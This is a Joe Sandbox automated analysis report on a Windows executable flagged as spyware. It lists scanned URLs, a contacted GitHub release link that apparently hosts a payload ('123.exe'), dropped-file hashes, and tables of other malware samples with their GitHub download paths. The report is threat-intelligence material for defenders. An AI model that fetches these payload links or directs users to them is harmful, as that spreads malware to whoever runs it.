https://github.com/readme	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js	0%	Avira URL Cloud	safe
https://github.com/about	0%	Avira URL Cloud	safe
https://github.com/edu	0%	Virustotal		Browse
https://github.com/features/code-review	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/sessions-599dffba3e8f.js	0%	Virustotal		Browse
https://github.com/readme	0%	Virustotal		Browse
https://github.com/customer-stories	0%	Virustotal		Browse
https://github.com/features	0%	Avira URL Cloud	safe
https://x.com/github	0%	Virustotal		Browse
https://github.com/features/issues	0%	Avira URL Cloud	safe
https://github.com/features/code-review	0%	Virustotal		Browse
https://user-images.githubusercontent.com/	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js	0%	Virustotal		Browse
https://www.githubstatus.com	0%	Avira URL Cloud	safe
https://github.com/about	0%	Virustotal		Browse
https://github.com/mobile	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	0%	Avira URL Cloud	safe
https://user-images.githubusercontent.com/	0%	Virustotal		Browse
https://github.com/features/issues	0%	Virustotal		Browse
https://skills.github.com	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-	1%	Virustotal		Browse
https://github.com/mobile	0%	Virustotal		Browse
https://github.com/solutions/industries/manufacturing	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png	0%	Virustotal		Browse
https://www.githubstatus.com	0%	Virustotal		Browse
https://api.github.com/_private/browser/stats	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	0%	Avira URL Cloud	safe
https://github.com/features	0%	Virustotal		Browse
https://github.com/solutions/industries/manufacturing	0%	Virustotal		Browse
https://resources.github.com/devops/tools/compare	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	1%	Virustotal		Browse
https://skills.github.com	0%	Virustotal		Browse
https://github.com/solutions/devops	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	0%	Virustotal		Browse
https://shop.github.com	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	0%	Virustotal		Browse
https://api.github.com/_private/browser/stats	0%	Virustotal		Browse
https://resources.github.com/devops/tools/compare	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-cc7cb714ead5.js	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-elements-a7dc71cd6e4e.js	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_	0%	Virustotal		Browse
https://github.githubassets.com/assets/wp-runtime-dc42d191447b.js	0%	Avira URL Cloud	safe
https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax	0%	Avira URL Cloud	safe
https://github.com/solutions/devops	0%	Virustotal		Browse
https://docs.github.com/site-policy/privacy-policies/github-privacy-statement	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_	0%	Avira URL Cloud	safe
https://resources.github.com/newsletter/	0%	Avira URL Cloud	safe
https://github.com/github	0%	Avira URL Cloud	safe
https://support.github.com?tags=dotcom-404	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/global-526475a50099.css	0%	Avira URL Cloud	safe
https://docs.github.com/get-started/accessibility/keyboard-shortcuts	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-810e4b1b9abd.js	0%	Avira URL Cloud	safe
https://github.com/features/packages	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu	0%	Avira URL Cloud	safe
https://www.electronjs.org	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/behaviors-ac844bd01e4d.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
github.com	140.82.121.3	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://github.com/abuzgreksi/456/releases/download/456/123.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/notifications/beta/shelf	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/industries/financial-services	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/s	SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://autohotkey.com	SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	netcomp.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/github/roadmap	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/site-3ab44dbdb8a0.css	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/devsecops	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-0c7b5281bcc9.css	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.careers	netcomp.exe.0.dr	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://x.com/github	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/sessions-599dffba3e8f.js	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/edu	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/customer-stories	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/readme	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/about	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/features/code-review	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/features	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/features/issues	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://user-images.githubusercontent.com/	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-	netcomp.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.githubstatus.com	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mobile	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	netcomp.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://skills.github.com	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/industries/manufacturing	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.github.com/_private/browser/stats	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://resources.github.com/devops/tools/compare	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/devops	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_	netcomp.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://shop.github.com	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-cc7cb714ead5.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-elements-a7dc71cd6e4e.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/wp-runtime-dc42d191447b.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.github.com/site-policy/privacy-policies/github-privacy-statement	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://resources.github.com/newsletter/	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/github	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://support.github.com?tags=dotcom-404	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/global-526475a50099.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.github.com/get-started/accessibility/keyboard-shortcuts	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-810e4b1b9abd.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/features/packages	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.electronjs.org	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/behaviors-ac844bd01e4d.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://resources.github.com/learn/pathways	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.tiktok.com/	netcomp.exe.0.dr	false	URL Reputation: safe	unknown
https://github.com/trending	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-cdd1e82b3795.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/github/site-policy/pull/582	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/solutions/industries/healthcare	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.community	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/enterprise/advanced-security	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/abuzgreksi/456/releases/download/456/123.exe"	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://api.github.com/_private/browser/errors	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/primer-61560ce103d3.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/features/discussions	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-fd68b41b03a0.j	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.github.com/site-policy/github-terms/github-terms-of-service	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/topics	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/enterprise/startups	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://partner.github.com	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/environment-a36e9a1c67ad.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/fluidicon.png	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/favicons/favicon.png	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-83	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/notifications-global-ce1721184096.js	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/	SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/features/actions	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/dark-6b1e37da2254.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://services.github.com	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/error-add24e2c1056.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/features/copilot	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://socialimpact.github.com	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://support.github.com?tags=dotcom-footer	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css	netcomp.exe.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
140.82.121.3	github.com	United States		36459	GITHUBUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467925
Start date and time:	2024-07-05 03:35:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.FileRepMalware.1111.23697.exe
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@2/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 64% Number of executed functions: 21 Number of non-executed functions: 203
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:36:10	API Interceptor	1x Sleep call for process: SecuriteInfo.com.FileRepMalware.1111.23697.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
140.82.121.3	6glRBXzk6i.exe	Get hash	malicious	RedLine	Browse	github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
	firefox.lnk	Get hash	malicious	CobaltStrike	Browse	github.com/john-xor/temp/blob/main/index.html?raw=true
	0XzeMRyE1e.exe	Get hash	malicious	Amadey, Vidar	Browse	github.com/neiqops/ajajaj/raw/main/file_22613.exe
	MzRn1YNrbz.exe	Get hash	malicious	Vidar	Browse	github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
	RfORrHIRNe.doc	Get hash	malicious	Unknown	Browse	github.com/ssbb36/stv/raw/main/5.mp3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
github.com	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe	Get hash	malicious	RUSTDESK	Browse	140.82.121.3
	main.ps1	Get hash	malicious	Unknown	Browse	140.82.114.4
	SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe	Get hash	malicious	RUSTDESK	Browse	140.82.121.4
	kematian_shellcode.ps1	Get hash	malicious	Unknown	Browse	140.82.121.3
	main.ps1	Get hash	malicious	Unknown	Browse	140.82.121.3
	update23.bat	Get hash	malicious	Braodo	Browse	140.82.121.4
	SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exe	Get hash	malicious	Unknown	Browse	140.82.121.4

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GITHUBUS	https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe	Get hash	malicious	RUSTDESK	Browse	140.82.121.3
	main.ps1	Get hash	malicious	Unknown	Browse	140.82.114.4
	SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe	Get hash	malicious	RUSTDESK	Browse	140.82.121.4
	kematian_shellcode.ps1	Get hash	malicious	Unknown	Browse	140.82.121.3
	main.ps1	Get hash	malicious	Unknown	Browse	140.82.121.3
	update23.bat	Get hash	malicious	Braodo	Browse	140.82.121.4
	SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exe	Get hash	malicious	Unknown	Browse	140.82.121.4

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	lem.exe	Get hash	malicious	Vidar	Browse	140.82.121.3
	file.exe	Get hash	malicious	Vidar	Browse	140.82.121.3
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	140.82.121.3
	5gO02Ijl9V.exe	Get hash	malicious	GuLoader	Browse	140.82.121.3
	ooXgr5BYnA.exe	Get hash	malicious	GuLoader, Lokibot	Browse	140.82.121.3
	7Bkd5ILk1o.exe	Get hash	malicious	GuLoader, Lokibot	Browse	140.82.121.3
	oFNtjcXGVB.exe	Get hash	malicious	FormBook, GuLoader	Browse	140.82.121.3
	Co0Wd0QVRU.exe	Get hash	malicious	Remcos, GuLoader	Browse	140.82.121.3
	J65wD7LHi0.exe	Get hash	malicious	GuLoader, Lokibot	Browse	140.82.121.3
	QeIcyVt0Op.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	140.82.121.3

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1616)
Category:	dropped
Size (bytes):	257717
Entropy (8bit):	5.978858693651615
Encrypted:	false
SSDEEP:	6144:DHkME2n9dH5M2vkm0y3Cl3pId9RY9GvZJT3CqbMrhryfQNRPaCieMjAkvCJv1Vi6:rkME2n9dH5M2vkm0y3Cl3pId9RY9GvZG
MD5:	DD94ECE9ECA34867FABB91CB2EEE9AD7
SHA1:	4B2B7241E5529ED2F217E7DFE892755EF3FC9070
SHA-256:	0E653A1237630F6B6DE0D04CDEBE9174C9D111247F689ADA7DEFD5A58868DED6
SHA-512:	58C3978C8F55063D4C64BDC5C04A05CA64599F2C2D39BFDBB580137F676D1BC9DE9AFEF0C2A162A099C6645A30014D064F39C692318FF4A765B5E7A6DDC86783
Malicious:	false
Reputation:	low
Preview:	......<!DOCTYPE html>.<html. lang="en". . data-color-mode="auto" data-light-theme="light" data-dark-theme="dark". data-a11y-animated-images="system" data-a11y-link-underlines="true". >.... <head>. <meta charset="utf-8">. <link rel="dns-prefetch" href="https://github.githubassets.com">. <link rel="dns-prefetch" href="https://avatars.githubusercontent.com">. <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">. <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">. <link rel="preconnect" href="https://github.githubassets.com" crossorigin>. <link rel="preconnect" href="https://avatars.githubusercontent.com">.. .. <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-efd2f2257c96.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-6b1e37da2254.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.462955560419983
Encrypted:	false
SSDEEP:	6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:kXD94+WlLZMM6YFHg+n
MD5:	C142E91B1E4D915E253107BF5CBE3FDD
SHA1:	54B7E60F8DD9F6ABE0C906D15D18947845A8513B
SHA-256:	DEFBC1210601D0FDC9821109F3909EF39704511E0D25FAB47094A39DDFBB47C8
SHA-512:	B4C5C67DF29AE4731A1AAFFD328EE796677742B5139D02CD74EAAC8E6D5E48DFFACBD44FB2AF85EC68A12D4C231A86A4CF8603CF35616416B14698DDB96BA742
Malicious:	false
Reputation:	low
